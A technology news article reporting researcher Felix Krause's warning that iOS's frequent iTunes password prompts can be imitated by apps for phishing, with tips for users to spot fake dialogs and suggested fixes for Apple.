#Bizwhiznetwork.com Innovation ΛI |Technology News
Anyone who’s spent more than a few minutes using iOS has been prompted to input their iTunes password. This can ensure that no one but you has access to your important account data. However, iOS tends to ask for your password quite often, and security researcher Felix Krause points out this good-intentioned practice could actually have the opposite effect.
According to Krause, Apple’s constant insistence that users type in their passwords leaves them open to phishing. It’s not only the frequency of requests, but the way iOS asks for that password makes it very easy for malicious developers to steal passwords. You might think you’re just typing your password into yet another Apple dialog box, but it could be a fake.
iOS asks for your password after system updates, when purchasing content under certain conditions, and when apps reach out to Apple services like iCloud and GameCenter. Thus, users are trained to expect that dialog box to appear at any time. Apple gives developers a tool called UIAlertController, which can produce a dialog box that looks identical to the system notification that’s always asking for your password. It would be a simple matter to use that popup to harvest passwords. If an app also has access to a user’s email address, the account is compromised.
Krause has not included example code for this attack, but he says it’s trivially easy to set up. He’s hoped Apple would address this issue without public pressure, but it’s something he’s been following for several years. Until Apple makes some changes, users can protect themselves by pressing the home button before inputting their password in dialog boxes. If the box is spawned by the app, it will disappear along with the rest of the app. If it’s actually a system dialog, it will remain on the screen. You can also open the settings to input your password, or look for the lock screen notification (see below).
Apple has a famously tight grip on the App Store–it constantly rejects apps for seemingly minor issues. Krause notes it would be easy to hide the UIAlertController from Apple until after an app is approved, and then remotely trigger it. Possible mitigation on Apple’s end would be to include the app’s icon in UIAlertController dialog boxes or just stop asking for the iTunes password so often. At the least, Apple might want to route users to the settings interface to confirm their identity rather than push the easy-to-fake popups.
